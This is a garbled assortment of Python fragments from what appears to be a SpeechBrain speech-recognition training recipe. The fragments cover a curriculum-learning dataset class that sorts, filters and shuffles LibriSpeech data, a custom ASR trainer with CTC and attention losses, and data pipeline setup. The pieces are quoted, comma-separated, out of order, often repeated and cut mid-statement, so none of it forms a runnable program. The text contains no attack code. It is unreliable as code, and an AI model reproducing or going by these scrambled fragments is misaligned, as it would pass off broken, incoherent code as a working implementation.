self.hparams.test_search(enc_out.detach(), wav_lens) return p_ctc, p_seq, wav_lens,", "# when sorting do not shuffle in dataloader ! otherwise is pointless #", "with torch.no_grad(): asr_brain.evaluate( test_datasets[k], max_key=\"ACC\", test_loader_kwargs=hparams[\"test_dataloader_opts\"], ) # # print(train_data) # train_set =", "def combined_filter(computed, key_min_value, key_max_value, key_test): \"\"\"Checks if the data example fulfills the filtering", "(or should) be overridden. The following methods are used and expected to have", "which curriculum based dataset be used. It can take one of three values", "whether the dataset needs to be reshuffled at the end of epoch \"\"\"", "batch in t: # # print(batch.duration) # # print(batch.wrd) # # if cnt", "\"sorted\" if len(dataset_ordering) > 0 else \"random\" filtered_data_ids = self._filter_dataset(self.data_ids, key_min_value, key_max_value, key_test)", "= self.hparams.compute_features(wavs) current_epoch = self.hparams.epoch_counter.current feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch) if stage ==", "self.hparams.ctc_weight * loss_ctc + (1 - self.hparams.ctc_weight) * loss_seq ) if stage !=", "If ``True``, this will only iterate a few batches for all datasets, to", "# We get the tokenizer as we need it to encode the labels", "validation \"on_stage_end\" on main process self.step = 0 run_on_main( self.on_stage_end, args=[Stage.VALID, avg_valid_loss, epoch],", ">= limit: continue return False for key, limit in key_max_value.items(): if computed[key] <=", "the first n data points found. Meant for debugging. Returns ------- FilteredSortedDynamicItemDataset Shares", "self.hparams.acc_computer() self.wer_metric = self.hparams.error_rate_computer() def on_stage_end(self, stage, stage_loss, epoch): \"\"\"Gets called at the", "stage = Stage.TRAIN, # **hparams[\"valid_dataloader_opts\"] # ) # with tqdm( # train_set, #", "only if `weights` is None batch_selection : str Information on how to order", "np.random.permutation(data_ids) def _random_shuffled_weights( self, data_ids ): \"\"\"Create random weightages for data_ids\"\"\" shuffled_ids =", "(int) Number of devices to run on. distributed_backend (str) One of ``ddp_nccl``, ``ddp_gloo``,", "self.optimizer = self.hparams.SGD(self.modules.parameters()) if self.checkpointer is not None: self.checkpointer.add_recoverable(\"optimizer\", self.optimizer) self.switched = True", "python3 \"\"\"Recipe for training a Transformer ASR system with librispeech. The system employs", "# If distributed_launch=True then # create ddp_group with the right communication protocol sb.utils.distributed.ddp_init_group(run_opts)", "0 run_on_main( self.on_stage_end, args=[Stage.VALID, avg_valid_loss, epoch], ) # Debug mode only runs a", "feats = self.hparams.compute_features(wavs) current_epoch = self.hparams.epoch_counter.current feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch) if stage", "assert len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise sorting gone wrong.\" weights = {}", "(str) One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``. device (str) The location for performing", "): # Decode token terms to words predicted_words = [ tokenizer.decode_ids(utt_seq).split(\" \") for", "hparams[\"train_csv\"], \"skip_prep\": hparams[\"skip_prep\"], }, ) # here we create the datasets objects as", "each epoch\"\"\" if stage != sb.Stage.TRAIN: self.acc_metric = self.hparams.acc_computer() self.wer_metric = self.hparams.error_rate_computer() def", "False if isinstance(self.optimizer, torch.optim.SGD): self.switched = True if self.switched is True: return if", "passed to `make_dataloader()` for making the train_loader (if train_set is a Dataset, not", "isinstance(train_set, DataLoader) or isinstance(train_set, LoopedLoader) ): train_set = self.make_dataloader( train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs )", "from data_id to weight, these weight(s) will be used to sort the dataset.", "min_key=min_key ) ckpt = sb.utils.checkpoints.average_checkpoints( ckpts, recoverable_name=\"model\", device=self.device ) self.hparams.model.load_state_dict(ckpt, strict=True) self.hparams.model.eval() def", "enters stage 2\"\"\" current_epoch = self.hparams.epoch_counter.current if not hasattr(self, \"switched\"): self.switched = False", "given in the YAML file). The tokenizer is loaded at the same time.", "at end-of-epoch if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process(): # report different epoch stages", "sortagrad # create tensorboard summary writer self.tensorboard_writer = SummaryWriter(self.hparams.output_folder + \"/tensorboard\") def compute_forward(self,", "* \"random\" - After dataset is ordered based on `ordering_info`, divide the dataset", "**valid_loader_kwargs, ) self.on_fit_start() self.train_set = train_set total_steps = len(train_set) if progressbar is None:", "train_data = sb.dataio.dataset.DynamicItemDataset.from_csv( # csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, # ) train_data = CurriculumOrientedDynamicDataset.from_csv( csv_path=hparams[\"train_csv\"],", "text_pipeline(wrd): yield wrd tokens_list = tokenizer.encode_as_ids(wrd) yield tokens_list tokens_bos = torch.LongTensor([hparams[\"bos_index\"]] + (tokens_list))", "the optimizer added to continue training if interrupted. inter_epoch_dataset_updation : bool Whether dataset", "stage, stage_loss, epoch): \"\"\"Gets called at the end of a epoch.\"\"\" # Compute/store", "non-finite losses before stopping. Default: ``3``. noprogressbar (bool) Whether to turn off progressbar", "if not hasattr(self, \"switched\"): self.switched = False if isinstance(self.optimizer, torch.optim.SGD): self.switched = True", "implement these operations in the same method is that computing some dynamic items", "float(max_value) for key,value in weights.items(): if (isinstance(min_value,float) and value < min_value) or \\", "is not None and hasattr( self.train_sampler, \"set_epoch\" ): self.train_sampler.set_epoch(epoch) # Time since last", "== \"sorted\": pass elif batch_selection == \"reverse-sorted\": weights = self._reverse_sort_batches(weights, batch_size) else: raise", "limit key_test : dict Map from key (in data or in dynamic items)", "loss (CTC+NLL) given predictions and targets.\"\"\" (p_ctc, p_seq, wav_lens, hyps,) = predictions ids", "disable=not enable ): self.step += 1 loss = self.evaluate_batch(batch, stage=Stage.VALID) avg_valid_loss = self.update_average(", "= hparams[\"data_folder\"] # train_data = sb.dataio.dataset.DynamicItemDataset.from_csv( # csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, # ) train_data", "weights filtered_sorted_ids = self._weighted_filtered_sorted_ids( weights, min_weight, max_weight, select_n ) return FilteredSortedDynamicItemDataset( self, filtered_sorted_ids", "import DynamicItemDataset, FilteredSortedDynamicItemDataset from speechbrain.dataio.sampler import ReproducibleRandomSampler from tqdm.contrib import tqdm import numpy", "If not None, will only keep data_point if weight[data_point] > min_weight max_weight :", "to display the progress of each epoch in a progressbar. \"\"\" if not", "If not None, only keep (at most) the first n filtered data_points. The", "encoders, decoders, tokens (e.g, characters instead of BPE), training split (e.g, train-clean 100", "# output layer for seq2seq log-probabilities pred = self.modules.seq_lin(pred) p_seq = self.hparams.log_softmax(pred) #", "sb.dataio.dataset.add_dynamic_item(datasets, audio_pipeline) # 3. Define text pipeline: @sb.utils.data_pipeline.takes(\"wrd\") @sb.utils.data_pipeline.provides( \"wrd\", \"tokens_list\", \"tokens_bos\", \"tokens_eos\",", "stage_loss} if stage == sb.Stage.TRAIN: self.train_stats = stage_stats self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current) else: stage_stats[\"ACC\"] = self.acc_metric.summarize()", "stage_stats = {\"loss\": stage_loss} if stage == sb.Stage.TRAIN: self.train_stats = stage_stats self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current) else:", "# test is separate test_datasets = {} for csv_file in hparams[\"test_csv\"]: name =", "5 epochs. The experiment file is flexible enough to support a large variety", "\"output_length\": res = self._output_length_comparator(key1,key2) elif key == \"alphabetic\": res = self._alphabetic_comparator(key1,key2) res *=", "return -1 else: return 0 class ASR(sb.core.Brain): r\"\"\"Brain class abstracts away the details", "compute the dynamic items twice. Arguments --------- key_min_value : dict Map from key", "torch optimizer constructor that has takes only the list of parameters (e.g. a", "Byte Pairwise Encoding (BPE) are used as basic recognition tokens. Training is performed", "must be updated every between epochs or not. It is used in CL", "# Debug mode only runs a few epochs if self.debug and epoch ==", "hparams=hparams, run_opts=run_opts, checkpointer=hparams[\"checkpointer\"], ) # adding objects to trainer: asr_brain.tokenizer = hparams[\"tokenizer\"] #", "% self.hparams.gradient_accumulation == 0: # gradient clipping & early stop if loss is", "= self._output_length_comparator(key1,key2) elif key == \"alphabetic\": res = self._alphabetic_comparator(key1,key2) res *= order #", "len(filtered_ids) == select_n: break filtered_ids.append((weights[data_id],i,data_id)) filtered_sorted_ids = [ tup[2] for tup in sorted(filtered_ids,", "# when sorting do not shuffle in dataloader ! otherwise is pointless hparams[\"train_dataloader_opts\"][\"shuffle\"]", "show progressbar if requested and main_process enable = progressbar and sb.utils.distributed.if_main_process() completed_steps =", "communication protocol sb.utils.distributed.ddp_init_group(run_opts) # 1. # Dataset prep (parsing Librispeech) from librispeech_prepare import", "checkpointer : speechbrain.Checkpointer By default, this will be used to load checkpoints, and", "batch_size=8 ): \"\"\"Reverse sort the dataset at batch level\"\"\" data_ids = list(weights.keys()) for", "dim=0) tokens_eos_lens = torch.cat( [tokens_eos_lens, tokens_eos_lens], dim=0 ) tokens = torch.cat([tokens, tokens], dim=0)", "list of data ids, fulfilling the filtering criteria.\"\"\" def combined_filter(computed, key_min_value, key_max_value, key_test):", "from the waveform batches to the output probabilities.\"\"\" batch = batch.to(self.device) wavs, wav_lens", "# Compute/store important stats stage_stats = {\"loss\": stage_loss} if stage == sb.Stage.TRAIN: self.train_stats", "file). The tokenizer is loaded at the same time. run_on_main(hparams[\"pretrainer\"].collect_files) hparams[\"pretrainer\"].load_collected(device=run_opts[\"device\"]) # Trainer", "``modules`` at the beginning of the ``fit()`` method. This behavior can be changed", "performed with (CTC/Att joint) beamsearch coupled with a neural language model. To run", "elsewhere depending on # # the path given in the YAML file). The", "group: return self.checkpointer.recover_if_possible( device=torch.device(self.device) ) def fit( self, epoch_counter, train_set, valid_set=None, progressbar=None, train_loader_kwargs={},", "== \"descending\": # train_data = train_data.filtered_sorted( # sort_key=\"duration\", reverse=True # ) # #", "stats stage_stats = {\"loss\": stage_loss} if stage == sb.Stage.TRAIN: self.train_stats = stage_stats self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current)", "= 1 if ordering[\"order\"] == \"asc\" else -1 if key == \"input_length\": res", "tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0) loss_seq = self.hparams.seq_cost( p_seq, tokens_eos, length=tokens_eos_lens ) loss_ctc", "index return weights def _reverse_sort_batches( self, weights=None, batch_size=8 ): \"\"\"Reverse sort the dataset", "epoch count. train_set : Dataset, DataLoader A set of data to use for", "key (in data or in dynamic items) to limit, will only keep data_point", "\"descending\": # train_data = train_data.filtered_sorted( # sort_key=\"duration\", reverse=True # ) # # when", "epochs for epoch in epoch_counter: # Training stage self.on_stage_start(Stage.TRAIN, epoch) self.modules.train() # Reset", "all processes self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch) self.avg_train_loss = 0.0 self.step = 0 # Validation", "epoch\"\"\" if stage != sb.Stage.TRAIN: self.acc_metric = self.hparams.acc_computer() self.wer_metric = self.hparams.error_rate_computer() def on_stage_end(self,", "progressbar and sb.utils.distributed.if_main_process() completed_steps = (epoch - 1) * total_steps with tqdm( self.train_set,", "self.step == self.debug_batches: break if ( self.checkpointer is not None and self.ckpt_interval_minutes >", "is used directly. train_loader_kwargs : dict Kwargs passed to `make_dataloader()` for making the", "tensorboard self.tensorboard_writer.add_scalar(\"Train/Loss/tot_loss\", loss, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/ctc_loss\", loss_ctc, global_step) self.tensorboard_writer.add_scalar(\"Train/Loss/att_loss\", loss_seq, global_step) # Debug mode", "= { \"epoch\": epoch, \"lr\": lr, \"steps\": steps, \"optimizer\": optimizer, } self.hparams.train_logger.log_stats( stats_meta=epoch_stats,", "in dynamic items) to limit, will only keep data_point if data_point[key] <= limit", "batches to run in debug mode, Default ``2``. debug_epochs (int) Number of epochs", "based on `ordering_info`, divide the dataset into batches of size `batch_size` and order", "elif duration1 < duration2: return -1 else: return 0 def _output_length_comparator( self, key1,", "self.fit_batch(batch) self.avg_train_loss = self.update_average( loss, self.avg_train_loss ) t.set_postfix(train_loss=self.avg_train_loss) # Write training summary to", "== \"alphabetic\": res = self._alphabetic_comparator(key1,key2) res *= order # If comparison using `key`", "self.hparams.ctc_weight) * loss_seq ) if stage != sb.Stage.TRAIN: current_epoch = self.hparams.epoch_counter.current valid_search_interval =", "only keep data_point if data_point[key] <= limit key_test : dict Map from key", "== self.debug_epochs: break def on_evaluate_start(self, max_key=None, min_key=None): \"\"\"perform checkpoint averge if needed\"\"\" super().on_evaluate_start()", "are `contiguous`, `random`, `sorted`, `reverse-sorted` - Example: * \"random\" - After dataset is", "was done with distributed_count > 0 and the distributed_backend is ddp, this will", "= dataio_prepare(hparams) # # We download the pretrained LM from HuggingFace (or elsewhere", "= {} for index,id in enumerate(sorted_data_ids): weights[id] = index return weights def _input_length_comparator(", "t: # # print(batch.duration) # # print(batch.wrd) # # if cnt == 5:", "don't need to compute the dynamic items twice. Arguments --------- key_min_value : dict", "+ self.step loss, loss_ctc, loss_seq = self.fit_batch(batch) self.avg_train_loss = self.update_average( loss, self.avg_train_loss )", "enough to support a large variety of different systems. By properly changing the", "called at the end of a epoch.\"\"\" # Compute/store important stats stage_stats =", "_custom_sorted_weights( self, data_ids, dataset_orderings ): \"\"\"Create `weights` for data points using `ordering_info`\"\"\" def", "os import torch from torch.utils.tensorboard import SummaryWriter import sys import logging from pathlib", "using ``input_length`` in ascending order , tie is broken using ``output_length`` in descending", "need to be overridden are: * ``compute_forward()`` * ``compute_objectives()`` The example below illustrates", "``True``, this will only iterate a few batches for all datasets, to ensure", "p_seq, tokens_eos, length=tokens_eos_lens ) loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens) loss = (", "\"\"\"Gets called at the beginning of each epoch\"\"\" if stage != sb.Stage.TRAIN: self.acc_metric", "hparams[\"train_dataloader_opts\"][\"shuffle\"] = False # if hparams[\"sorting\"] == \"ascending\": # # we sort training", "sub-class the ``Brain`` class and override any methods for which the default behavior", "replacements={\"data_root\": data_folder}, # ) train_data = CurriculumOrientedDynamicDataset.from_csv( csv_path=hparams[\"train_csv\"], replacements={\"data_root\": data_folder}, ) ordering_info =", "output length\"\"\" length1 = len(self.data[key1][\"wrd\"]) length2 = len(self.data[key2][\"wrd\"]) if length1 > length2: return", "right optimizer on the training start\"\"\" super().on_fit_start() # if the model is resumed", "valid_set = self.make_dataloader( valid_set, stage=sb.Stage.VALID, ckpt_prefix=None, **valid_loader_kwargs, ) self.on_fit_start() self.train_set = train_set total_steps", "validation/test batches\"\"\" with torch.no_grad(): predictions = self.compute_forward(batch, stage=stage) loss, _, _ = self.compute_objectives(predictions,", "dataio_prepare(hparams) # # We download the pretrained LM from HuggingFace (or elsewhere depending", "tokens, tokens_lens = batch.tokens if hasattr(self.modules, \"env_corrupt\") and stage == sb.Stage.TRAIN: tokens_eos =", "noqa # Create experiment directory sb.create_experiment_directory( experiment_directory=hparams[\"output_folder\"], hyperparams_to_save=hparams_file, overrides=overrides, ) # multi-gpu (ddp)", "torch.cat([wav_lens, wav_lens]) tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0) # compute features feats = self.hparams.compute_features(wavs)", "reverse=reverse) ] return filtered_sorted_ids def _parse_dataset_order( self, dataset_order=\"\" ): \"\"\"Takes in `ordering_info` in", "ordering the dataset at batch level. select_n : None, int If not None,", "> key2 * -1 - key1 < key2 * 0 - key1 =", "Encoding (BPE) are used as basic recognition tokens. Training is performed on the", "duration1 < duration2: return -1 else: return 0 def _output_length_comparator( self, key1, key2", "be passed all modules in ``modules`` at the beginning of the ``fit()`` method.", "a single dataset) the only methods that need to be overridden are: *", "# and no LM to give user some idea of how the AM", "is broken using ``output_length`` in descending order Note: This is used only if", "(bool) If ``True``, automatic mixed-precision is used. Activate it only with cuda. max_grad_norm", "= torch.LongTensor([hparams[\"bos_index\"]] + (tokens_list)) yield tokens_bos tokens_eos = torch.LongTensor(tokens_list + [hparams[\"eos_index\"]]) yield tokens_eos", "pairs These modules are passed to the optimizer by default if they have", "hparams : dict Each key:value pair should consist of a string key and", "hparams[\"data_folder\"], \"merge_lst\": hparams[\"train_splits\"], \"merge_name\": hparams[\"train_csv\"], \"skip_prep\": hparams[\"skip_prep\"], }, ) # here we create", "dataset using random shuffling return else: return def check_and_reset_optimizer(self): \"\"\"reset the optimizer if", "decoders, tokens (e.g, characters instead of BPE), training split (e.g, train-clean 100 rather", "def weights_filter(weights,min_value,max_value): \"\"\"Checks if the data example has weight within the range (`min_value`,", "0 def _alphabetic_comparator( self, key1, key2 ): \"\"\"Compare two data points based on", "model and reshuffles the dataset. By, default, it is False sortagrad: int Number", "= batch.to(self.device) wavs, wav_lens = batch.sig tokens_bos, _ = batch.tokens_bos # Add augmentation", "on the main process. Arguments --------- epoch_counter : iterable Each call should return", "continue return False for key, limit in key_max_value.items(): if computed[key] <= limit: continue", "= False # elif hparams[\"sorting\"] == \"descending\": # train_data = train_data.filtered_sorted( # sort_key=\"duration\",", "epoch}, max_keys=[\"ACC\"], num_to_keep=5, ) elif stage == sb.Stage.TEST: self.hparams.train_logger.log_stats( stats_meta={\"Epoch loaded\": self.hparams.epoch_counter.current}, test_stats=stage_stats,", "averge if needed\"\"\" super().on_evaluate_start() ckpts = self.checkpointer.find_checkpoints( max_key=max_key, min_key=min_key ) ckpt = sb.utils.checkpoints.average_checkpoints(", "the use case. For a simple use case (e.g., training a single model", "= self._alphabetic_comparator(key1,key2) res *= order # If comparison using `key` returned data points", "torch.LongTensor(tokens_list) yield tokens sb.dataio.dataset.add_dynamic_item(datasets, text_pipeline) # 4. Set output: sb.dataio.dataset.set_output_keys( datasets, [\"id\", \"sig\",", "self, weights=None, batch_size=8 ): \"\"\"Reverse sort the dataset at batch level\"\"\" data_ids =", "self.optimizer if current_epoch > self.hparams.stage_one_epochs: del self.optimizer self.optimizer = self.hparams.SGD(self.modules.parameters()) # Load latest", "True: return if current_epoch > self.hparams.stage_one_epochs: self.optimizer = self.hparams.SGD(self.modules.parameters()) if self.checkpointer is not", "= False if isinstance(self.optimizer, torch.optim.SGD): self.switched = True if self.switched is True: return", "raise NotImplementedError( \"Ordering Type must be one of random, sorted, weighted_sorted.\" ) #", "only runs a few epochs if self.debug and epoch == self.debug_epochs: break def", "key1 > key2 * -1 - key1 < key2 * 0 - key1", "Testing for k in test_datasets.keys(): # keys are test_clean, test_other etc asr_brain.hparams.wer_file =", "the averaged checkpoint at the end of the evaluation stage # delete the", "time. run_on_main(hparams[\"pretrainer\"].collect_files) hparams[\"pretrainer\"].load_collected(device=run_opts[\"device\"]) # Trainer initialization asr_brain = ASR( modules=hparams[\"modules\"], opt_class=hparams[\"Adam\"], hparams=hparams, run_opts=run_opts,", "if self.step % self.hparams.gradient_accumulation == 0: # gradient clipping & early stop if", "# Testing for k in test_datasets.keys(): # keys are test_clean, test_other etc asr_brain.hparams.wer_file", "from speechbrain.dataio.dataloader import LoopedLoader from speechbrain.core import Stage import time def make_dataloader( dataset,", "duration1 = float(self.data[key1][\"duration\"]) duration2 = float(self.data[key2][\"duration\"]) if duration1 > duration2: return 1 elif", "the weights filtered_sorted_ids = self._weighted_filtered_sorted_ids( weights, min_weight, max_weight, select_n ) return FilteredSortedDynamicItemDataset( self,", "datasets = [train_data, valid_data] + [i for k, i in test_datasets.items()] # We", "= self.wer_metric.summarize(\"error_rate\") # log stats and save checkpoint at end-of-epoch if stage ==", "self.acc_metric.summarize(), epoch) # Only run validation \"on_stage_end\" on main process self.step = 0", "# gradient clipping & early stop if loss is not fini self.check_gradients(loss) self.optimizer.step()", "< duration2: return -1 else: return 0 def _output_length_comparator( self, key1, key2 ):", "num_to_keep=1, ) def recreate_train_dataset(self,epoch): \"\"\"Gets called at the end of a epoch. This", "need it to encode the labels when creating # mini-batches. tokenizer = hparams[\"tokenizer\"]", "ids, fulfilling the filtering criteria.\"\"\" def combined_filter(computed, key_min_value, key_max_value, key_test): \"\"\"Checks if the", "``3``. noprogressbar (bool) Whether to turn off progressbar when training. Default: ``False``. ckpt_interval_minutes", "the model is resumed from stage two, reinitialize the optimizer current_epoch = self.hparams.epoch_counter.current", ") valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"], replacements={\"data_root\": data_folder}, ) valid_data = valid_data.filtered_sorted(sort_key=\"duration\") # test", "automatically created. If a DataLoader is given, it is used directly. valid_set :", "number is passed, all epochs are run. jit_module_keys (list of str) List of", "location for performing computations. auto_mix_prec (bool) If ``True``, automatic mixed-precision is used. Activate", "self, key1, key2 ): \"\"\"Compare two data points based on input length\"\"\" duration1", "\"/tensorboard\") def compute_forward(self, batch, stage): \"\"\"Forward computations from the waveform batches to the", "batch.to(self.device) wavs, wav_lens = batch.sig tokens_bos, _ = batch.tokens_bos # Add augmentation if", "dict Each key:value pair should consist of a string key and a hyperparameter", "res return res shuffled_data_ids = self._random_shuffle_data_ids(data_ids) sorted_data_ids = sorted(shuffled_data_ids,key=cmp_to_key(compare)) weights = {} for", "Example: * \"input_length:asc,output_length:desc\" - Sort the dataset using ``input_length`` in ascending order ,", "for ``n`` number of epochs By default, it is ``-1``. \"\"\" def __init__(", "= make_dataloader( # valid_data , # stage = Stage.TRAIN, # **hparams[\"valid_dataloader_opts\"] # )", "= valid_data.filtered_sorted(sort_key=\"duration\") # test is separate test_datasets = {} for csv_file in hparams[\"test_csv\"]:", "key_max_value, key_test): filtered_data_ids.append(data_id) return filtered_data_ids def _weighted_filtered_sorted_ids( self, weights, min_value=None, max_value=None, select_n=None, reverse=False", "(parsing Librispeech) from librispeech_prepare import prepare_librispeech # noqa # Create experiment directory sb.create_experiment_directory(", "--------- modules : dict of str:torch.nn.Module pairs These modules are passed to the", "feedback from model and reshuffles the dataset. By, default, it is False sortagrad:", "0: # gradient clipping & early stop if loss is not fini self.check_gradients(loss)", "match the use case. For a simple use case (e.g., training a single", "options to change the runtime environment, including debug (bool) If ``True``, this will", "SummaryWriter import sys import logging from pathlib import Path import speechbrain as sb", "default if they have trainable parameters, and will have ``train()``/``eval()`` called on them.", "weights[id] = index return weights def _input_length_comparator( self, key1, key2 ): \"\"\"Compare two", "(bool) Whether to turn off progressbar when training. Default: ``False``. ckpt_interval_minutes (float) Amount", "datasets to be used in the brain class. It also defines the data", "them. opt_class : torch.optim class A torch optimizer constructor that has takes only", "as fin: hparams = load_hyperpyyaml(fin, overrides) # If distributed_launch=True then # create ddp_group", "librispeech. The system employs an encoder, a decoder, and an attention mechanism between", "to run in debug mode, Default ``2``. debug_epochs (int) Number of epochs to", "len(data_count)) shuffled_data_ids += data_ids[start_index:end_index] assert len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise sorting gone", "= stage_stats self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current) else: stage_stats[\"ACC\"] = self.acc_metric.summarize() current_epoch = self.hparams.epoch_counter.current valid_search_interval = self.hparams.valid_search_interval", "# # print(batch.duration) # # print(batch.wrd) # # if cnt == 5: #", "only keep (at most) the first n filtered data_points. The possible sorting is", "self.modules.eval() avg_valid_loss = 0.0 with torch.no_grad(): for batch in tqdm( valid_set, dynamic_ncols=True, disable=not", "# Load latest checkpoint to resume training if interrupted if self.checkpointer is not", "parameters given a single batch in input\"\"\" # check if we need to", "using the weights filtered_sorted_ids = self._weighted_filtered_sorted_ids( weights, min_weight, max_weight, select_n ) return FilteredSortedDynamicItemDataset(", "\"\"\"Initialize the right optimizer on the training start\"\"\" super().on_fit_start() # if the model", "a progressbar. \"\"\" if not ( isinstance(train_set, DataLoader) or isinstance(train_set, LoopedLoader) ): train_set", "None and len(filtered_ids) == select_n: break filtered_ids.append((weights[data_id],i,data_id)) filtered_sorted_ids = [ tup[2] for tup", "If distributed_launch=True then # create ddp_group with the right communication protocol sb.utils.distributed.ddp_init_group(run_opts) #", "overrides=overrides, ) # multi-gpu (ddp) save data preparation run_on_main( prepare_librispeech, kwargs={ \"data_folder\": hparams[\"data_folder\"],", "self.switched is True: return if current_epoch > self.hparams.stage_one_epochs: self.optimizer = self.hparams.SGD(self.modules.parameters()) if self.checkpointer", "index return weights def _input_length_comparator( self, key1, key2 ): \"\"\"Compare two data points", "reverse=False ): \"\"\"Randomly shuffle the dataset at batch level\"\"\" data_ids = list(weights.keys()) for", "and sb.utils.distributed.if_main_process() completed_steps = (epoch - 1) * total_steps with tqdm( self.train_set, initial=self.step,", "compute_forward(self, batch, stage): \"\"\"Forward computations from the waveform batches to the output probabilities.\"\"\"", "modules to a set of data. In order to use the ``fit()`` method,", "valid_loader_kwargs=hparams[\"valid_dataloader_opts\"], ) # Testing for k in test_datasets.keys(): # keys are test_clean, test_other", "length=tokens_eos_lens ) loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens) loss = ( self.hparams.ctc_weight *", "= self.evaluate_batch(batch, stage=Stage.VALID) avg_valid_loss = self.update_average( loss, avg_valid_loss ) # Debug mode only", "target_words = [wrd.split(\" \") for wrd in batch.wrd] self.wer_metric.append(ids, predicted_words, target_words) # compute", "of the ``fit()`` method, which iterates epochs and datasets for the purpose of", "class abstracts away the details of data loops. The primary purpose of the", ") self.on_fit_start() self.train_set = train_set total_steps = len(train_set) if progressbar is None: progressbar", "broken using ``output_length`` in descending order Note: This is used only if `weights`", "return the result if res == 0: continue else: return res return res", "averaged checkpoint self.checkpointer.save_and_keep_only( meta={\"ACC\": 1.1, \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=1, ) def recreate_train_dataset(self,epoch): \"\"\"Gets", "dynamic items) to limit, will only keep data_point if data_point[key] <= limit key_test", "w: self.wer_metric.write_stats(w) # save the averaged checkpoint at the end of the evaluation", "return 1 elif text1 < text2: return -1 else: return 0 class ASR(sb.core.Brain):", "train.py hparams/transformer.yaml > python train.py hparams/conformer.yaml With the default hyperparameters, the system employs", "AM is doing hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens) elif stage == sb.Stage.TEST: hyps,", "= index return weights def _reverse_sort_batches( self, weights=None, batch_size=8 ): \"\"\"Reverse sort the", "filtering criteria.\"\"\" def combined_filter(computed, key_min_value, key_max_value, key_test): \"\"\"Checks if the data example fulfills", "\"\"\" # ordering type can be random, sorted # keys for ordering info", "for performing computations. auto_mix_prec (bool) If ``True``, automatic mixed-precision is used. Activate it", "After dataset is ordered based on `ordering_info`, divide the dataset into batches of", "waveform batches to the output probabilities.\"\"\" batch = batch.to(self.device) wavs, wav_lens = batch.sig", "(epoch - 1) * total_steps with tqdm( self.train_set, initial=self.step, dynamic_ncols=True, disable=not enable, )", "order Note: This is used only if `weights` is None batch_selection : str", "self.hparams.valid_search_interval == 0: # for the sake of efficiency, we only perform beamsearch", "is not None and self.ckpt_interval_minutes > 0 and time.time() - last_ckpt_time >= self.ckpt_interval_minutes", ", # stage = Stage.TRAIN, # **hparams[\"valid_dataloader_opts\"] # ) # with tqdm( #", "stage == sb.Stage.TRAIN: hyps = None elif stage == sb.Stage.VALID: hyps = None", "None: progressbar = not self.noprogressbar # Iterate epochs for epoch in epoch_counter: #", "self._reverse_sort_batches(weights, batch_size) else: raise NotImplementedError( \"Ordering Type must be one of random, sorted,", "\"alphabetic\": res = self._alphabetic_comparator(key1,key2) res *= order # If comparison using `key` returned", "loss_seq, global_step) # Debug mode only runs a few batches if self.debug and", "hyps,) = predictions ids = batch.id tokens_eos, tokens_eos_lens = batch.tokens_eos tokens, tokens_lens =", "set of data. In order to use the ``fit()`` method, one should sub-class", "E.g., batch_size, num_workers. DataLoader kwargs are all valid. progressbar : bool Whether to", "[] orderings = dataset_order.split(\",\") for order in orderings: if order.strip() == '': continue", "by overriding the ``configure_optimizers()`` method. hparams : dict Each key:value pair should consist", "-1: # number of epochs for which curriculum must be used is defined", "with the right communication protocol sb.utils.distributed.ddp_init_group(run_opts) # 1. # Dataset prep (parsing Librispeech)", "The example below illustrates how overriding these two methods is done. For more", "runs without crashing. debug_batches (int) Number of batches to run in debug mode,", "elif stage == sb.Stage.VALID: hyps = None current_epoch = self.hparams.epoch_counter.current if current_epoch %", "key_max_value={}, key_test={} ): \"\"\"Returns a list of data ids, fulfilling the filtering criteria.\"\"\"", "wav_lens, hyps def compute_objectives(self, predictions, batch, stage): \"\"\"Computes the loss (CTC+NLL) given predictions", "- Options for keys: `input_length`, `output_length`, `alphabetic` - Options for order: `asc`, `desc`", "sorting is applied, but only on the first n data points found. Meant", "within the range (`min_value`, `max_value`)\"\"\" if min_value == None and max_value == None:", "order to use the ``fit()`` method, one should sub-class the ``Brain`` class and", "values * ``-1`` - Use curriculum learning for all epochs * ``n`` -", "valid_search_interval = self.hparams.valid_search_interval if ( current_epoch % valid_search_interval == 0 or stage ==", "main_process enable = progressbar and sb.utils.distributed.if_main_process() completed_steps = (epoch - 1) * total_steps", "as tokenization and encoding train_data, valid_data, test_datasets, tokenizer = dataio_prepare(hparams) # # We", "pred = self.modules.seq_lin(pred) p_seq = self.hparams.log_softmax(pred) # Compute outputs hyps = None if", "\") for utt_seq in hyps ] target_words = [wrd.split(\" \") for wrd in", "int If not None, only keep (at most) the first n filtered data_points.", "based on alphabetic order\"\"\" text1 = self.data[key1][\"wrd\"] text2 = self.data[key2][\"wrd\"] if text1 >", "set to 1.1 so checkpointer only keeps the averaged checkpoint self.checkpointer.save_and_keep_only( meta={\"ACC\": 1.1,", "directly. train_loader_kwargs : dict Kwargs passed to `make_dataloader()` for making the train_loader (if", "shuffled_data_ids += data_ids[start_index:end_index] assert len(shuffled_data_ids) == len(data_ids) , \"OOPS!! Batchwise sorting gone wrong.\"", "as w: self.wer_metric.write_stats(w) # save the averaged checkpoint at the end of the", "-1 - key1 < key2 * 0 - key1 = key2 \"\"\" for", "a DataLoader is automatically created. If a DataLoader is given, it is used", "using random shuffling return else: # recreate dataset using preferred cl approach return", "items available) \"\"\" # ordering type can be random, sorted # keys for", "functions that can (or should) be overridden. The following methods are used and", "optimizer from Adam to SGD self.check_and_reset_optimizer() predictions = self.compute_forward(batch, 